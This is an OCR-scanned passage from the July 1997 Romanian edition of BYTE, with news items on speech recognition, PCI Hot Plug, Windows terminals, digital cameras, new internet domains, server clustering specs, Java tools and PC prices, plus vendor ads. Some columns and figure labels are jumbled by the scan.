an, firma IBM va anunţa preţul, data pune-
rii în circulație precum şi alte detalii. Firma
Motorola declara că primele produse bazate
pe propriul sistem de recunoaștere a vor-
birii continue vor fi puse în circulaţie spre
sfârşitul anului 1997. Persoanele oficiale ale
firmei Kurzweil sugerează că vor putea oferi
la sfârşitul acestui an o tehnologie pentru
dictarea continuă de uz general.
Dacă NaturallySpeaking funcţionează
aşa cum spune firma Dragon, atunci acest
program va reprezenta un pas tehnologic
important, o alternativă la clasicele tasta-
turi, utilizabilă de o categorie mult mai lar-
gă de oameni. Pe măsură ce calculatoarele
devin din ce în ce mai puternice, preţul
memoriilor scade, iar cartelele de sunet și
aplicaţiile de generare a vorbirii devin un
lucru obişnuit, sistemele de recunoaștere a
vorbirii se vor îndrepta spre fluxul princi-
pal al tehnicii de calcul. — Joe Lazzaro
Conectarea la cald
va oferi o disponi-
bilitate mai mare
O nouă tehnologie va permite administra-
torilor de servere PC să extindă, să actuali-
zeze sau să schimbe cartelele adaptoare
PCI, fără ca sistemele să fie oprite. Noul
standard, specificatia PCI Hot Plug, va fi
gata la sfârşitul primăverii, iar primul hard-
ware compatibil cu noua specificaţie PCI
IULIE 1997 BYTE România 13
LOT
Sistemul PCI Hot Plug
Soft de nivel înalt care cere SO-ului operații de adaj
discontinue și primitive Ho
Sistem de operare
Adaptor Adaptor
driver 41 me driver #n
? ?
Platformă *,
a
====%> Utilizator
AP
„===> Agent de gestiune
Primitive
Hot Plug
Nivele
software
Nivele
hardware
este oferit de furnizorii de. O-uri).
Primitivele Hot Plug sunt speci
lug serviciul Hot PI y de regu
fice cererilor driverului de sistem Hi
Cartelă
adaptoare #n
Indicator
de avertizare
| Comutatoare
bus PCI
de alimentare
și bus 3
Hot Plug va fi disponbil la inceputul celei
de a doua jumătăţi a acestui an. Desigur,
pentru ca sistemele de operare să suporte
noua specificaţie, utilizatorii vor trebui să
aştepte după Microsoft, Novell şi SCO pen-
tru integrarea acestei noi tehnologii în pro-
priile sisteme de operare. Toţi aceşti mari
furnizori intenționează să ofere suport spe-
De regulă, mediul Windows es-
te asociat unui program client
„plinuţ”, dar care arată ca unul
„Slăbuţ”, așa cum este NT. În
cuvântarea rostită la recenta
conferinţă Windows Hardware Engineering
din San Francisco, Bill Gates a confirmat că
firma Microsoft a adoptat o atitudine
necruțătoare în privința terminalelor
Windows. „Utilizatorii doresc programe
client mici și simple“, spunea Gates. De
asemenea, el a subliniat că îmbinarea unui
browser Web cu sistemul de operare într-un
program client mic, principial reprezintă o
contradicție.
Ceea ce Gates a sugerat în acel moment,
a fost periculoasa asemănare cu descrierea
lui WinFrame a firmei Citrix, care permite
Este (în curând) în NT
cificației Hot Plug prin actualizarea soft-
ware-ului de sistem în decursul unui an.
Noua specificaţie este proiectată pentru a
transforma serverele PC în platforme mai
bune, destinate rulării fără întrerupere a apli-
caţiilor critice din domeniul afacerilor. PCI
Hot Plug este proiectat în trei variante, dar
toate au un atribut comun și anume faptul că
reţelei de clienţi să ruleze programe găzduite
pe un server NT. De fapt, firmele Microsoft
și Citrix au încheiat un acord în privinţa licen-
telor prin care, Microsoft va utiliza tehnolo-
gia firmei Citrix in cadrul terminalelor Win-
dows, pentru viitoarele versiuni NT. Microsoft
a declarat că va integra în NT 5 un terminal
mic pe care-l va introduce și în NT 4 în aceas-
tă vară, dar fără să specifice data exactă.
Clienţii WinFrame sunt accesibili sub
DOS, Windows, 0S/2, Mac și diferite versi-
uni Unix. Arhitectura de consolă inteligen-
tă a firmei Citrix interceptează apelurile
interfeţei dispozitivului grafic (GDI) și le
redirectează spre client. Astfel clientul
recepționează reprezentările grafice ale
aplicaţiei ce se execută la distanță pe server;
mașina client nu rulează în acel moment
Windows sau aplicaţii Windows.
- Dave Andrews
14 BYTE Romania IULIE 1997
serverul nu poate fi oprit in momentul
înlocuirii sau actualizării dispozitivelor.
Aceste variante sunt: Hot Plug PCI Replace-
ment (înlocuieşte un dispozitiv defect sau pe
cale de a se defecta cu altul identic); Hot PCI
Upgrade (înlocuiește dispozitivele PCI şi dri-
verele existente cu versiuni noi ale acestora);
şi Hot PCI Expansion (instalează cartele de
intrare/ieșire şi drivere software adiționale).
Problema în privința îndreptării spre teh-
nologia Hot Plug se află chiar pe platformele
furnizorilor, cum sunt furnizorii de servere
PC şi sisteme de operare, spunea Karl Wal-
ker, director pentru dezvoltarea tehnologi-
că al firmei Compaq. (Firma Compaq este
un susținător important al iniţiativei Hot
Plug, unul din scopurile sale fiind lansarea
de hardware compatibil Hot Plug la înce-
putul celei de a doua jumătăți a acestui an).
Scopul este acela de a permite utilizatorilor
să-şi poată folosi adaptoarele PCI pe care le
au, dar cu noi servere şi sisteme de operare
actualizate pentru Hot Plug. Hot Plug va
avea nevoie atât de drivere noi, cât şi de mo-
dificarea sistemului de operare (vezi figura
de mai sus). De asemenea, pe placa de bază,
serverele destinate specificaţiilor Hot Plug
vor avea nevoie de componente adiționale,
cum sunt controlerul Hot Plug şi sloturile
specifice comutatoarelor de tensiune care
permit software-ului să întrerupă alimenta-
rea unui slot în timp ce sistemul funcționea-
ză. lar serverele vor trebui să fie astfel con-
struite încât utilizatorii finali să poată acce-
sa ușor cartela adaptoare PCI fără a pertur-
ba operaţiile executate pe PC.
Magistrala PCI nu este una tolerantă la
erori, prin urmare, dacă o cartelă PCI nu mai
funcţionează, compromiţând astfel integri-
tatea magistralei PCI sau a software-ului de
sistem, serverul trebuie reiniţializat. Dar
tehnologia Hot Plug promite să amelioreze
timpii morţi cauzați de defectarea unor
cartele sau de necesitatea actualizării aces-
tora. lar acest lucru va permite multor ser-
vere robuste să ruleze aplicaţii critice fără
întrerupere.
— Dave Andrews
Aparatele foto di-
gitale devin utile
Aparatele foto digitale încep să părăsească
domeniul de curiozitate al înaltei tehnolo-
gii, îndreptându-se spre lumea activităților
zilnice. Capacitatea acestor aparate de a oferi
o previzualizare a imaginilor şi de a le încărca
într-un PC, cel puţin în principiu, atrage
mulți clienți. Dar, o dată cu apariţia primelor
serii de produse, acestea au rămas doar în
stadiul de a fi dorite, în special de către cei
conştienţi de prețul acestora. Aproape toate
aparatele foto digitale apărute la început au
fost la fel de scumpe şi la fel de limitate în
privinţa calităţii, suferind datorită vieții prea
scurte a bateriilor şi a capacităţii mici de sto-
care. Acum această situaţie s-a schimbat.
PalmCam al firmei Pa-
nasonic este portabil,
memorând 94 imagini.
Ultimele aparate foto digitale se plasează
în fruntea categoriei produselor robuste,
oferind noi funcțiuni remarcabile și având
un nou model de împachetare. Cu noile op-
tiuni de stocare şi software îmbunătăţit
oferite, aceste produse au reuşit să pătrundă
pe piaţă.
De obicei, aparatele foto digitale anteri-
oare arătau ca nişte binocluri profesionale.
Dar niciodată ele nu au avut o formă pe
deplin nouă, cu dimensiuni mai reduse. De
exemplu, noul aparat PV-DC1000 Palm-
Cam la 499$ al firmei Panasonic (201-348-
7000;http://www.panasonic.com) can-
tăreşte exact 5.5 uncii (155,65 grame), ofe-
rind acum o calitate VGA și stocând maxim
94 de imagini (la o rezoluţie de 320 x 240
dpi) sau 32 de magini la o rezoluţie mai bună
(640x480dpi). lar acesta include un afişor
LCD de 1.2 inch destinat vizualizării ulte-
rioare a imaginilor. Aparatul funcționează
cu o baterie nichel-cadmiu reîncărcabilă.
O altă inovaţie vine de la firma Nikon
(800-52-NIKON; http://www.nikonusa
„com) cu aparatul său Coolpix la 499$.
Acesta pare să fie ultimul model de aparat
foto digital. În esență, Coolpix 100 este un
aparat digital uşor de utilizat ce stochează
imaginile pe o cartelă conectabilă la PC: Se
pot face fotografii, iar apoi acestea pot fi
accesate imediat prin introducerea cartelei
în PC sau laptop. Imaginile luate prin ori-
care dintre obiectivele firmei Nikon sunt
foarte bune. Aparatul poate stoca 21 de
imagini la o rezoluţie fină sau 42 de ima-
gini la o rezoluţie normală.
De asemenea, putem remarca noul aparat
foto digital PowerShot 350 al firmei Canon
(800-848-4123; http://www.ccsi .canon.
com). El are un afişor LCD color de 1.8 inch
şi un senzor CCD (Charge-Coupled Device)
cu 350.000 pixeli. Pentru stocarea imagi-
nilor PowerShot utilizează o cartelă amovi-
bilă CompactFlash cu 2MB memorie în care
încap până la 47 de fotografii. Preţul apara-
tului este de 699$, fiind disponibil în mai
multe versiuni la firma Konica.
Până acum, stocarea imaginilor a consti-
tuit o mare problemă; multe aparate nu au
oferit o posibilitate ușoară și ieftină de a
„schimba filmul“. Acum, putem găsi pe
piaţă câteva proiecte competitive, incluzând
noua minicartela lansată de firma Intel,
folosită atât de aparatul digital Konica
Q-EZ cât şi de HP PhotoSmart (fabricate
de Konica). Aceste mici cartele sunt ieftine
(aproximativ 50$ - cele cu 2MB si 75$ - cele
cu 4MB) şi stochează 16 fotografii la o re-
zoluţie fină sau 32 de fotografii la o rezolu-
ţie obișnuită. Cartelele vor fi fabricate atât
de Intel cât și de alte firme, astfel că ele vor
fi larg răspândite. Fără a utiliza aparatul foto
digital, ci doar cu ajutorul unui adaptor
opţional, se pot vizualiza imaginile direct
pe ecran. Alţi furnizori, inclusiv Canon şi
NEC, utilizează formatul CompactFlash.
Toate aceste îmbunătăţiri i-au determi-
nat pe analişti să prezică o dublare a vân-
zărilor aparatelor foto digitale în acest an
față de anul trecut. Oamenii de afaceri care
doresc integrarea ușoară a imaginilor în do-
cumente şi partajarea sigură a lor între di-
verşi clienţi sunt ajutaţi astfel să-și atingă
scopul. „Cred că o mare parte din dez-
voltarea acestei pieţe va fi susţinută de dome-
niul activităţilor cotidiene“, spunea Jona-
than Cassel, analist Dataquest.
— Jon Pepper
Este vorba
despre domenii
Internetul, fata de o largime de banda mai
mare, are nevoie şi de mai multe nume de
domeniu. Creşterea explozivă a Web-ului
ne-a plasat pe toți, începând cu persoanele
particulare și până la firmele uriaşe, în situ-
ația de a căuta cu disperare un nume valid
de apel. Curând, dacă International Ad
Hoc Committee (IAHC; http://www.iahc
.org/) isi va urma propriul sau drum, un nou
set de nume de domenii de nivel inalt
(TLD) ne va uşura munca.
IAHC este o organizație compusă din
membri ce provin atât din rândul creato-
CoolPix
de la Nikon
este o camera
cu cartela.
rilor standardului Internet, cum sunt Inter-
net Society si Internet Assigned Numbers
Authority, cat si din grupurile pentru stan-
darde internationale, cum sunt Internati-
onal Telecommunications Union si World
Intellectual Property Organization. Dome-
niile de nivel inalt propuse sunt:
.firm-pentru firme și afaceri
„store-pentru firmele care oferă spre vân-
zare bunuri de consum
„web-pentru entități cu activități asociate
WWW
„arts-pentru entități având activităţi cul-
turale şi de divertisment
„rec-pentru siturile de divertisment /recre-
atie
.info-pentru entităţile ce furnizează servicii
informaţionale
„nom-pentru clasificarea individuală sau
personală
Cât de reală este această necesitate a nu-
melor noi ? Suficient de reală, întrucât alte
IULIE 1997 BYTE România 15
LOTURI
două întreprinderi au început să aibă pro-
priile alternative la proiectul IAHC. eDNS
(http://www.edns.net) a propus un model
de piaţă liberă pentru domeniile de nivel
înalt. Name Space (http://namespace.auto-
no.net/) a făcut deja un pas înainte cu pro-
priul său domeniu de nume al serverelor şi
domenii de nivel înalt create de clienţi. To-
tuși, fără binecuvântarea unui standard sau
a unei coordonări între entități, aceste orga-
nizații, în prezenţa domeniilor extinse ale
IAHC, se pot confrunta cu probleme de su-
pravietuire, ce nu se vor lăsa aşteptate. „Da-
că totul decurge bine, veți putea vedea noile
domenii de nivel înalt a sfârşitul acestui an“,
spunea Martin Burack, director executiv la
Internet Society. Şi cu aceasta, Internetul va
face încă un pas important de la rădăcinile
sale academice spre propria dezvoltare co-
mercială.
- Steven J. Vaughan-Nichols
Specificatiile vor
oferi grupurilor de
PCo forta de fier
Deplasarea serverelor PC pe taramul calcu-
latoarelor mini si mainframe poate lua am-
ploare din cauza grupării noului software
de interfață pentru servere $i staţii de lucru.
Firmele Microsoft, Compaq, Intel și alte
firme (peste 40) aşteaptă să finalizeze spre
sfârşitul acestui an, specificația arhitecturii
interfeței virtuale (VIA). Această arhitec-
tură abstractizează detaliile rețelelor spe-
ciale (SAN) utilizate în grupuri de servere
PC. SAN sunt rețele de viteză mare ce cu-
prind servere PC, subsisteme de stocare și
staţii de lucru client, ce rulează aplicaţii dis-
tribuite, cum sunt procesarea tranzacţiilor
şi aplicaţiile pentru luarea deciziilor. Aceste
reţele, precum ServetNet a firmei Tandem
Computer si Scalable Coherent Interface
a firmei Dolphin Interconnect Solutions,
sunt compuse din cartele de interfata si soft-
ware de rețea ce permit serverelor să comu-
nice cu alte reţele într-un timp mai scurt
decât în cazul rețelelor LAN tradiționale.
Unul din scopurile arhitecturii interfeței
virtuale este obținerea unor performanțe
mai mari, prin reducerea duratelor de
întârziere la comutarea contextelor şi pro-
tocoalelor, atunci când aplicaţiile interac-
ționează cu o rețea specială. Un alt scop este
acela de a îndepărta dezvoltatorii de apli-
caţii de necesitatea de a cunoaşte detalii
despre hardware-ul ce se află în spatele
rețelei speciale. „Specificaţia va permite
dezvoltatorilor să scrie software îndrăzneţ,
cu informaţii de grup şi care va funcţiona
16 BYTE România. IULIE 1997
Do po gi A aaa cr pom tem, pm. em aden (em. iam, pen dna |
“Vedere generală
Mai multă putere, prețuri mai mici
Noile sisteme, dotate cu ultimele procesoare x86 ale firmelor Intel și AMD, au apărut deja. În
urma chestionării marilor furnizori de PC-uri, pentru o configuraţie maximă a unui sistem Pentium
Illa 233-MHz (PII), vă puteţi aștepta să plătiţi aproximativ 2900$ și cu aproximativ 300-400$ mai
putin pentru un sistem în configuraţie similară cu procesor AMD K6 la 233-MHz. (Pentru mai
multe informaţii despre performanţele acestor noi procesoare, citiți Bits din luna trecută).
În acest chestionar, BYTE a insistat asupra sistemelor la 233-MHz pentru a compara preţurile
procesoarelor K6 si Pll. Procesorul PIl este disponibil și în varianta 266-MHEz, iar în curând, în
varianta 300-MHez, în timp ce K6 este disponibil la o viteză maximă de 233 MHz. Amintind că
preţurile sistemelor prezentate aici pot varia în funcţie de configuraţie și că acestea reprezintă
doar o imagine de moment, se prezintă mai jos un sumar despre ceea ce se poate cumpăra și la
ce pret.
SISTEME PENTIUM II
DREN N SEDO eRe eee eee e enon ene neneneensecnstaeane
AST Bravo LC 6233
233 MHz PIl cu 512 KB L2
cache; max. 128 MB memo-
rie EDO; 2 GB EIDE disc hard;
unitate CD ROM 16x;
cartela grafica S3 Virge DX
(2 MB). Pret estimat: 2500$.
(800-876-4278;
http://www.ast.com)
Acer 9606 Minitower
233 MHz Pll: 32 MB me-
morie RAM. Pret estimat:
2949$ cu monitor de 17
inch, 2449$ fara monitor.
(800-551-ACER;
http://www.acer.com)
Dell Dimension
XPS H233
233 MHz Pll; 64 MB memorie
EDO ECC; 512 KB L2 cache;
4.3 GB disc hard; monitor
Philips de 17 inch; cartelă
grafică Matrox Millennium
(4 MB);unitate CD ROM NEC
16X; cartelă de sunet
Yamaha Wavetable Sound;
speakere Altec Lansing ACS
290; Modem U.S. Robotics
33.6 w/ Voce; USB. 3079$.
(800-BUY-DELL;
http://www.dell.com)
Digital Celebris GL-2 —
233 MHz PII; 32 MB me-
morie RAM, 512 KB L2
cache; 3.2 GB EIDE disc hard,
unitate CD-ROM 16X,
cartelă grafică Matrox MGA
Millennium (2 MB WRAM),
cartelă de rețea 10/100 Ba-
se-TX auto Ethernet. 3313$.
(800-344-4825;
http://www.digital.com)
Gateway 2000
PSE ENE SOAR OREO Ree eee ee nen eeeeeeneeeeeyennes.
233 MHz Pll; 64 MB memo-
rie RAM; 3.2 GB Fast ATA
disc hard; cartelă video Virge
GX (4 MB): unitate CD-ROM
12X sau 16X; cartelă de
sunet Ensoniq Wavetable
PCI Audio; speakere Altec
Lansing ACS 41; modem X2
Telepath 56 Kbps. 2889$.
(800-846-2000;
http://www.gw2k.eom)- ~
Intergraph TD-225
233 MHz PII (capabilitate
duală-CPU); minitower; 64
MB memorie RAM; 512 KB
cache; 1.7 GB disc hard; car-
telă grafică Matrox Millenni-
um (2 MB RAM); cartelă de
sunet Ensoniq wave-table
plus claviatură multimedia;
cartelă de rețea 10Base-TX
Ethernet; CD-ROM 12X; uni-
tate floppy; monitor de 17
inch. 3379$.
(800-763-0242:
http://www.intergraph.com)
Polywell P7/233G
233 MHZ PII; minitower; 32
MB memorie EDO RAM; 512
KB L2 cache; cartelă video Di-
amond 3D S3-Virge 2000 (cu
4 MB); disc hard Maxtor 5.1
GB Ultra-IDE, 5400 rpm; uni-_
tate floppy 1.44 MB; tastatu-
ră, mouse; unitate CD-ROM
12X EIDE; cartelă de sunet
Crystal 16 biti; monitor de 17
inch; adaptor Intel 100 Pro
10/100MB EtherExpress PCI.
3337$.
(800-999-1278;
http://www.polywell.com)
SISTEME K6
CyberMax
PowerMax A22
233-MHz K6; 512 KB pipe-
line burst L2 cache; 32 MB
memorie RAM; 4 GB disc
hard; cartelă grafică Matrox
MGA Millennium (4 MB
WRAM); unitate CD ROM
16X Max; monitor 17 inch;
cartelă de sunet Ensoniq 32
biti; speakere Altec Lansing
ACS 540 si ACS 5250;
modem de 33.6 Kbps; tas-
tatură cu microfon. 2349$.
(800-433-9868;
http://www.cybmax.com)
CyberMax
PowerMax A51
La fel ca PowerMax A22
exceptand: 64 MB memorie
EDO RAM; cartelă grafică
Matrox (8 MB); speakere
ACS 400 si ACS 250. 2749$.
Mitsuba
233 MHz K6; 32 MB me-
morie RAM; 512 KB pipeline
sincron L2 cache; 2.1 GB
Quantum Fireball ST Ultra
DMA disc hard; accelerator
grafic Trident 64 biti; unitate
CD ROM 12X Toshiba; adap-
tor Intel EtherExpress Pro
10/100; monitor Hyundai de
17 inch; mouse, tastatură.
2129$.
(909-392-2000;
http://www .mitsuba.com)
- Polywell K6233Mx
Aceeași configuraţie ca
P7/233G, dar cu procesor K6
la 233 MHz. 3021$.
- Jason Krause
[i e e ee el oe er ee Oe a) a al
Experienţa în materie de sisteme informatice integrate de monitorizare a vânzărilor pentru reţele de
magazine plasează ICL printre cei mai căntați furnizori de aplicaţii şi echipamente Team POS de pe
piața mondială. De aceea, când ieși la cumpărături, poti conta pe faptul că ICL se află întotdeauna la
dispoziția ta.
Cele mai bune
ICL se află în vârful
preferințelor celor mai
importante reţele de
magazine. Reţele comerciale de renume
precum Auchan, Billa, Carrefour,
Dunhill, La Rinascente, Laura Ashley,
McDonald’s, Migros, Marks &
Spencer, Manor, Sainsbury’s, Shell sunt
doar câteva exemple care vă oferă
imaginea pe care şi-a câştigat-o ICL
printre cei care ştiu să facă astfel încât
cumpărăturile să fie nu doar o plăcere,
ci şi o afacere rentabilă.
The Business Solutions Company
Pentru relații suplimentare contactaţi: ICL - International Computers Limited (U.K.), Branch Romania & Rep. Moldova,
Bd. Republicii 44-46, sector 2, Bucureşti, Tel: 401 250 61 17, Fax: 401 250 58 18
Parteneri autorizați: GENESYS SOFTWARE S.R.L. (Bucureşti) Tel: 01 220 32 80; INTELPROF INTERNATIONAL S.R.L. (Braşov) Tel: 068 419 706;
MIXERA S.R.L. (Brăila) Tel: 039 634 917; ALFASOFT S.A. (Cluj-Napoca) Tel: 064 197 586; ELCOSOFT S.R.L. (Cluj-Napoca) Tel: 064 191 236;
TOP EDGE ENGINEERING S.R.L. (Craiova) Tel: 051 413 193; ROMUS TRADING & DEVELOPMENT LTD (laşi) Tel: 032 210 492;
FIBA IMPORT EXPORT S.R.L. Ree! Tel: 044 114 868; CORES S.R.L. (Timisoara) Tel: 056 190 051; DATALOG GEMENI IER (Tg. Mureş) Tel: 065 169 367
n
FUJITSU
PCs e NOTEBOOKS ¢ SERVERS
TIAU i În întâmpinarea novela
i a Ina A ~~ A ““ dumneavoastră am implementat
trebuie Sa sustin 2113 BS) . Cit 2 conceptul calității totale, calitate .
i i — a See eC nceeeicMiiiceciaciacii
Aveti nevoie de e a a COMRACE COMPUTERS,
CaiCulatOare perform
mondiale incorporate in
calculatoarele COMRACE.
optimal CO nfig Ş rate Acestea sunt proiectate,
optimizate şi testate astfel
încât aplicaţiile
dumneavoastră să ruleze la
5 : performanţă maximă
fiabile chiar şi 24 ore/zi.
ante Cele mai noi tehnologii
3 ani garantie integrala.
sustinute printr-un Asistenţă, suport tehnic şi
service ope rativ service asigurate de
profesionişti.
Ri
Cu un angajament integral pentru
satisfacția utilizatorului prin
calitate totală,
| d
© 1997 COMRACE COMPUTERS
TCM Reise Rieti Alba lulia: CRISTAL SOFT INTERNATIONAL - 058-813159 *Arad: LEXIMIS - 057-251245 *Bacau: NERATON SERVICE - 034-181507 «Baia Mare: CUMULUS LOGIC - 062-
i 433248 «Braşov: COSIDOR COM - 068-310534; ERIMEX - 068-143594 *Brăila: ROM GT PLUS - 039-611660 *Bucureşti: ALSYS DATA - 01-4112626 Călăraşi: OPTIM SOFT -
*fax:051-413209 042-314589 *Cluj-Napoca: TELEZIMEX - 064-425103 *Constanta: BRIO BIT - 041-616811 *Deva: RECEP PLUS - 054-218205 *Focsani: QUATTRO IMPEX - 037-625134
Bucuresti ¢tel:01-3361318 *Galati: SIMM'S INTERNATIONAL - 036-443344 «laşi: BETALINE - 032-271281 +Miercurea Ciuc: BITRACE - 066-172090 *Oneşti: COMPUTER SERVICE - 034-326632
VREI *Pitesti: OPEN SYSTEMS - 048-219000 *Reşița: SELCO - 055-215301 *Rîmnicu Vilcea: BIT CENTER - 050-730109 *Satu Mare: DATA ELECTRONIC - 061-737635 *Sibiu:
: 3 DATA PRO - 069-210489 *Slatina: TANDEM SERVICE - 049-423184 «Suceava: DATA SERVICE - 030-214982 «Timisoara: ETA 2 U - 056-199508: EXACT - 056-220170 *Tirgu
E-Mail — office@comrace.eunet.ro Jiu: ELTOP - 053-218666 «Tirgu Mures: CARO COMP - 065-210040
Comandă un COMRACE: şi lasă-l să lucreze pentru tine
Datapro Report
Noile unelte Java împodobesc serverele
e doi ani cu Java, cea mai mare piaţă es-
te cea a uneltelor de dezvoltare a aplica-
ţiilor. Datapro a văzut în piaţa de astăzi patru
generaţii distincte (și suprapuse) de astfel
de unelte.
Prima generaţie a început în decembrie
1995, chiar înainte de lansarea uneltelor Java
Developement Kit (JDK) 1.0 ale firmei Java-
Soft. Aceste unelte, începând cu categoria
JDK, un mediu cu componente esenţiale
pentru cod și până la Symantec Cafe, un
mediu de dezvoltare complet interactiv (IDE),
au fost primele clasate în categoria uneltelor
axate pe cod.
A doua generaţie a fost oferită dezvoltato-
rilor o dată cu primul mediu vizual de dezvol-
tare interactiv. Aceste produse au inclus un
Produsul Jamba al firmei AimTech este un
astfel de exemplu; utilizatorii creează
apple-turi Java prin completarea unei
machete de intrare și prin manipularea
vizuală a obiectelor, iar produsul generează
automat codul Java corespunzător. (Există
o cale de a introduce propriul cod Java, dar
aceasta nu este prea ușoară). Un alt produs
este Coda al firmei RandomNoise (planifi-
cat să apară în această vară); pentru dez-
voltarea codului, acest produs utilizează ca
interfață un modul de tehnoredactare com-
puterizată.
A patra generaţie de unelte oferă posibili-
tatea de a construi aplicaţii Java pe partea
de server. Aceste pachete au început să
apară pe piaţă pe parcursul celei de a doua
Cele patru generații ale uneltelor de dezvoltare Java
Generaţie Exemple
Prima * Java Development Kit 1.0, 1.1
Axată pe cod; câteva unelte vizuale * Netscape Navigator
Din 1995 până acum. ° Symantec Cafe
A doua ¢ SunSoft Java Workehon |
Unelte de dezvoltare vizuală cu mediu pentru * Symantec Visual Cafe
generare de cod * Microsoft Visual J++ 1.0
Din 1996 până acum * ObjectShare Parts for Java 1.0
* Metrowerks CodeWarrior
* Penumbra Mojo
* Marimba Bongo
: * Castanet
Atreia . - AimiTech Jamba
Unelte de dezvoltare vizuală cu generare de cod °*RandomNoise Coda
automată; pot avea limitări în generarea de cod * Bluestone Sapphire/Web 3.0
De la 1996 până acum ° RogueWave JFactory
A patra * GemStone for Java
Capabilităţi Java pe partea de server; pot avea * IBM Visual Age for Java
unelte de dezvoltare pe partea de client ¢ SunSoft JavaPlan
Din 1996 până acum * Parts for Java 2.0
* Visual J++ 1.1
* JavaWorkshop 2.0
mediu pentru cod, precum și unelte grafice
prefabricate pentru manipularea obiectelor
uzuale, cum sunt cele folosite la construirea
interfeţei utilizator. Uneltele de dezvoltare
apărute în a doua jumătate a anului 1996
intră toate în această categorie, care includ
trei dintre cele mai cunoscute medii de dez-
voltare interactive: Java WorkShop al firmei
SunSoft, Visual Cafe al firmei Symantec si
Visual J++ al firmei Microsoft. Alte unelte din
aceasta categorie sunt Parts for Java a firmei
ObjectShare, CodeWarrior (care lucreaza
atât cu cod Java cât și cu C++ sau Pascal) a
firmei Metrowerks și Mojo a firmei Penumbra.
A treia generaţie de produse permit
crearea aplicaţiilor Java scriind un cod mic.
jumătăţi a anului 1996, iar noul JDK 1.1, care
oferă posibilitatea scrierii aplicaţiilor server,
va avea cu certitudine aceste unelte. Astfel
de produse sunt GemStone pentru server
Java al firmei cu același nume, JavaPlan
CASE al firmei SunSoft și versiunile actuali-
zate Parts for Java, JavaWorkshop și Visual
J++. De asemenea, firma IBM lucrează la un
proiect care să aducă Java pe calculatoarele
mainframe.
În anul 1997 așteptăm să vedem pe piaţă
mult mai multe unelte din generaţia a treia și
a patra.
Deborah Hess, analist principal al serviciului
Insight din cadrul firmei Datapro. Alte informaţii la
609-764-0100; http://www. datapro. com.
lhe
pe platforme hardware ale diverselor firme
producătoare,“ spunea Jim Henry, direc-
tor al departamentului de dezvoltare
ServerNet din cadrul firmei Tandem. „Uti-
lizatorii finali vor putea alege hardware de
mică sau înaltă performanţă, în funcţie de
soluţia potrivită, ştiind că software-ul lor
va funcționa cu acel hardware.“
Arhitectura interfeţei virtuale reprezin-
tă oaltă cale, de-a lungul atâtor sisteme de
operare, a bazelor de date cu informaţii de
grup, prin care serverele PC se dezvoltă în
scopul manipulării masivelor în ordinea
intrărilor şi alte aplicaţii anterioare ges-
tionate de calculatoarele mainframe.
Firma Microsoft va introduce arhitectu-
ra interfetei virtuale in a doua versiune (pri-
ma gestionează mai mult de două noduri) a
propriei tehnologii Wolfpack, care este
programată pentru testele beta în anul
1998, în concordanţă cu declarațiile lui
Mark Wood, director de producţie al Win-
dows NT Server la Microsoft. Firma Mi-
crosoft nu este unicul furnizor de sisteme
de operare ce oferă VIA; există şi alți dez-
voltatori de sisteme software precum
Novell si SCO.
Arhitectura interfetei virtuale va fi com-
patibilă cu modul de transfer asincron
(ATM), Ethernet, Fibre Channel şi cu alte
arhitecturi de reţea. Ceea ce-și propune
această nouă tehnologie este ca specifi-
caţiile să fie independente de sistemul de
operare și hardware, permiţând utilizato-
rilor să folosească servere RISC sau x86
pentru sprijinirea mediilor eterogene de
calcul. Dave Andrews
Unde trecutul
și prezentul
se întâlnesc
Discul istoriei anunţă viitorul
modelului de interfață utilizator
Filmul de desen animat al istoriei univer-
sului înglobează elemente din programele
educative, jocurile interactive pe Internet
şi cărțile umoristice. Mașina timpului
inclusă în program te poartă de la începu-
turile primordiale şi până în glorioasa
Grecie, chestionându-te și oferindu-ți jocuri
de-a lungul acestei călătorii. Acest CD-
ROM se poate justifica prin valoarea educa-
tivă pe care are în procesul de învăţare al
copiilor sau pur şi simplu de recreere. Dar
profesioniștii în tehnica de calcul pot fi, de
asemenea, interesaţi de tehnicile interfeţei
utilizator ale programului, pe care firme
ca Microsoft şi Netscape au inceput să le
IULIE 1997 BYTE România 19
utilizeze.
De exemplu, pe „platforma universală“
aCD-ROM-ului, datele sunt disponibile la
cerere; nu trebuie să le cauţi pe propriul disc
hard local, într-o reţea locală sau pe Inter-
net. Când te distrezi cu un joc găzduit peun
server Web la distanţă, software-ul ascunde
browserul în spatele interfeței jocului.
Componentele acestui disc pot fi uşor
adaptate pentru activităţi cooperante în
domeniul software. Acest CD-ROM a
depășit cadrul istoriei pentru a ne arăta care
ar putea fi viitorul modelelor de interfață
utilizator.
- Alan Joch
Noile servicii
de retea GSM
În curând, ultimele standarde europene
GSM vor oferi mai multă inteligență
rețelelor telefonice. Acestea vor permite
operatorilor de reţea să creeze noi servicii
şi să utilizeze caracteristicile de gestiune a
apelurilor telefonice, cum este transferul
inteligent prin cablul telefonic, atunci când
telefonul mobil nu poate fi contactat, sau
—
|
i
|
ag
Desenul animat al Istoriei Universului
Human Code, Austin, TX.
800-659-5455 sau 512-477-5455;
http://www.humancode.com; 24.95$
transferul postei vocale celulare, daca al
doilea apel nu poate fi realizat. După spuse-
le furnizorilor europeni de servicii GSM,
mulți abonaţi nu folosesc chiar toate ser-
viciile uzuale ale rețelei existente. O parte
din funizorii GSM atribuie acest lucru com-
plexităţii interfeţei utilizator. „Oamenii ştiu
ce doresc să facă în viitor cu ajutorul tele-
foanelor mobile. Însă ei nu ştiu cum să facă
aceste lucruri,“ spunea Ken Blakeslee,
directorul departamentului de dezvoltare
a firmei Nortel şi președintele asociaţiei
Mobile Data Association. „Prin urmare,
primul lucru ce trebuie făcut este acela de
a furniza dispozitive care să ofere servicii-
lor existente, cum sunt mesageria, poşta
20 BYTE Romania LULIE 1997
vocală, identitatea apelantului, o cale de uti-
lizare mult mai intuitivă. Următorul pas va
oferi servicii personale ce pot fi parame-
trizate de la distanţă, prin reţea, de către uti-
lizatori,“ spunea Blakeslee.
De exemplu, firmele Ericsson şi Nokia
au abordat această problemă folosind pro-
priile cartele PC, adăugând platformelor de
calcul un telefon GSM complet. Conectând
una din aceste cartele într-un notebook
multimedia, pe lângă serviciile de mesagerie
scurtă, fax, poştă electronică și acces la
distanță, avem şi un telefon GSM, interfața
utilizator a telefonului fiind chiar note-
book-ul.
Recent, firma Motorola a prezentat un
„telefon inteligent“ ce încorporează o
agendă, un planificator, poşta electronică
Dispozitivul bazat pe Java de la Nortel este
construit să ofere e-mail și alte informaţii
şi o interfață bazată pe creion digital (pen-
based). Teleport 9080 al firmei AEG
Mobile Communication a urmărit
îmbunătăţirea interfeţei utilizator prin for-
marea numărului de telefon cu ajutorul
